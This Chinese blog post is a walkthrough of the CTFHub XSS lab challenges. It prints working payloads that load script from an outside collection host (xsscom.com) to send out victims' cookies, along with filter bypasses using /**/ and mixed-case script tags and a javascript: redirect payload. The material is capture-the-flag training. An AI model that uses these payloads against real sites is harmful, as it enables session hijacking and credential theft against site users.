ctfhub-技能树-xss题集全部习题详解-最新

最新推荐文章于 2025-04-23 08:15:00 发布
最新推荐文章于 2025-04-23 08:15:00 发布
阅读量5.5k 收藏 58
点赞数 16
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73562787/article/details/132220400
版权

ctfhub技能树里的题集:

反射型xss

攻击流程:

①黑客发送带有xss恶意脚本的链接给用户

②用户点击了恶意链接,访问了目标服务器(正常的服务器)

③目标服务器(正常的服务器)将xss同正常的页面返回到用户的浏览器中

④用户浏览器解析了网页中xss恶意代码,向恶意服务器(也就是这里我们搭建的xss平台)发起请求

⑤黑客从自己搭建的恶意服务器中获取用户提交的信息和数据

 

1.先XSS platform平台,在上面注册一个账号,链接如下

xss platform平台

2.创建一个项目,默认模块即可,命名随意

3.复制红框内容

先提交

这里可以看到我们传了恶意代码进去

然后再复制url,把它复制到第二个框框发送,在我们的xss平台的项目中就会显示刚刚的数据包的信息,在cookie中发现了flag

存储型xss:

用上面同样的方法,同样的恶意代码

这里是传入服务器,并存储在那里

点击这个恶意链接时就会发送请求给恶意服务器,从而获得请求的信息和数据(里面藏有flag)

区别于前面反射型xss的是,他建立恶意连接是在于每一次都要发送含恶意代码,而这个存储xss不需要,一旦发送过一次,以后每次访问它时,都会含有恶意代码

DOM反射:

查看网页源码,第一个框框这个位置是我们可控的,查看对应位置的源码

结合</textarea>'"><script src=http://xsscom.com//He7bc3></script>构成上面源码部分闭合符合条件,可以删掉</textarea>'">不影响

';</script><script src=http://xsscom.com//He7bc3>//

传入第一个框框,提交

//是单行注释的意思,//那一行后面的都被注释掉了,不再执行

源码:
<script>
  $("#text")[0].innerHTML = 'CTFHub is very niubility';
</script>
传入,闭合处理后:
 <script>
        $("#text")[0].innerHTML = '';
 </script>
<script src=http://xsscom.com//He7bc3>//';
</script>

再复制url,传入第二个框框

在平台上受到记录

DOM跳转:

查看源码:

分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL

<script>
        var target = location.search.split("=")
  //以等号分割成两份,一份是参数名,另一份是参数的值(可利用)
        if (target[0].slice(1) == "jumpto") {
  //其中target[0].slice(1)是指去掉?后面的参数名
            location.href = target[1];
  //如果参数名相等,就location.href(表示页面跳转)到target[1],也就是参数的值
        }
</script>

参考:CTFHub XSS DOM跳转 WriteUp_CVE-柠檬i的博客-CSDN博客

可以利用js代码和 jQuery 的 $.getScript() 函数来异步加载并执行来自 xss平台 的 js 脚本,使用前提是网站引用了jQuery。

这里构造:

http://challenge-c644076cd9fc7c0b.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xsscom.com//He7bc3")

过滤空格

用/**/绕过 <script/**/src=http://xsscom.com//He7bc3>/**/</script>

过滤关键字:

过滤了script

大小写混拼试一试,就过了(擦汗)

<ScRipt src=http://xsscom.com//He7bc3> </ScRipt>

发送

caatttz
关注
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 2787
XSS系列的目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三: DOM反射。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7830
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub技能树 Web-XSS 详解
weixin_45808483的博客
11-15 3894
反射 启动环境 我们在第一个框中输入 1 ,发现 hello后多了一个 1 ,这说明我们可以通过输入来更改页面内容 我们输入弹窗测试一下,发现成功弹窗 <script>alert(/xss/)</script> 我们将更改页面后的url输入第二个框,返回Successfully,猜测在后台进行访问。 这样的话我们就可以使用XSS platform平台。 下面这篇文章中向我们演示XSS platform的攻击测试。 Web安全XSS...
2025年常见渗透测试面试-XSS目+回答)
soc的博客
04-08 1093
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。如果给你一个XSS盲打漏洞,但是返回来的信息显示,他的后台是在内网,并且只能使用内网访问,那么你怎么利用这个XSS?如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?如果给你一个XSS漏洞,你还需要哪些条件可以构造一个蠕虫?在社交类的网站中,哪些地方可能会出现蠕虫?如果叫你来防御蠕虫,你有哪些方法?XSS是什么,修复方式是?黑盒如何检测XSS漏洞?
CTFHUB-技能树-Web-XSS-反射
Static______的博客
04-11 1924
参考链接:https://blog.csdn.net/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 740
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 1129
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
XSS-CTFHub
Keeping it fresh at all times.
02-04 937
本文是CTFHub技能树Web系列的文章之一,重点学习了Web安全中的XSS漏洞。XSS是Web安全必学漏洞,需要多加训练、达到精通。
ctfhubxss
小宇的web博客
05-22 1779
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
CTFHUB------XSS反射(WP)
热门推荐
Y4tacker的博客
07-23 1万+
文章目录前言XSS测试平台 前言 一开始我直接在上面写js脚本发现出错,最后发现只能通过下面的输入框来执行XSS测试,于是我们只能用XSS测试平台解决问 XSS测试平台 注册一个XSS测试平台 这里随便填写 勾选默认模块就够了,点击下一步 这时会出现一个找个将代码复制 拼接到网站后缀name后面,点击send 这时平台会收到一个记录点开即可 得到flag ...
【CTF】CTFHub------web-XSS-反射
从零开始的网安生活
07-23 1794
文章目录XSS反射 XSS 反射 1.注册登录xss平台,我的项目-创建-填写名称-选择默认模块 XSS平台在这儿 2.点击目链接进入,将网址name=后改为平台提供的代码后,send 在项目接收内容中获得flag ...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
CTFHUB技能树XSS——反射
weixin_73049307的博客
10-19 1599
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)
CTFHub——XSS
2302_79119987的博客
03-28 2010
"fangfa('可控点')"> 使用 ” 闭合:与上思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUB-XSS
weixin_51706044的博客
09-29 527
经过测试,第一个文本框是用于测试使用 第二个文本框应该是将信息发送至后台,进行处理, 因此我们只能是在XSS测试平台上进行获取注册成功后顺便创建一个项目,选择默认配置成功后会给一个地址 直接插入构造的url中即可这时会接受到一个信息 即可获得flag ...
CTFhubxss漏洞
weixin_46954909的博客
05-15 1071
前期了解:上半部分是用户执行的操作,下半部分是模拟服务器的操作。
CTFHub技能树-XSS
最新发布
star3119391396的博客
04-23 426
可以利用js代码和 jQuery 的 $.getScript() 函数来异步加载并执行来自 xss平台 的 js 脚本,使用前提是网站引用了jQuery。区别于前面反射xss的是,他建立恶意连接是在于每一次都要发送含恶意代码,而这个存储xss不需要,一旦发送过一次,以后每次访问它时,都会含有恶意代码。分析一下,代码意思是 从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。反射,直接使用xss平台,将生成的地址传入第一个空。
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 1万+
最近闲的无聊,玩玩CTF吧,并把自己的解思路分享给大家。大佬多指教。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5326
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
ctfhub 技能树web xss
01-10
### CTFHub Web技能树 XSS 学习路径和挑战 #### 了解XSS的基础概念 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的Web安全漏洞,允许攻击者向其他用户的浏览器注入恶意脚本。这种类的攻击可以分为三类:反射XSS存储XSS以及基于DOM的XSS[^1]。 #### 掌握基本工具和技术 对于初学者来说,理解并掌握一些基础技术是非常重要的。例如,学会查看网页源代码中的HTML结构,通过开发者工具(F12)来分析页面加载过程中的请求响应数据流,特别是关注HTTP头部信息里的`Set-Cookie`字段及其属性设置情况,如`HttpOnly`, `Secure`, 和`SameSite`参数等[^4]。 #### 实践操作指南 为了更好地理解和应对不同形式下的XSS威胁,在实际环境中动手练习必不可少。可以从简单的实验环境开始尝试编写自定义的有效载荷(payload),逐步过渡到更复杂的场景模拟真实世界的攻击手法。值得注意的是,构建有效的XSS Payload通常依赖于JavaScript的知识水平;因此提高这方面的能力有助于创造更加巧妙且难以被防御机制识别出来的攻击方式[^2]。 #### 安全意识培养和社会工程学防范 除了技术和编码能力之外,还需要重视个人隐私保护与社会工程学方面的教育。比如当遇到未知来源的信息提示更改设备登录凭证时要保持警惕心态,并采取适当措施验证其合法性再做决定。此外,定期更新软件版本以修复已知的安全缺陷也是预防潜在风险的重要手段之一[^3]。 ```javascript // 示例Payload用于展示如何创建一个简单弹窗警告框 <script>alert('This is a test');</script> ```
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值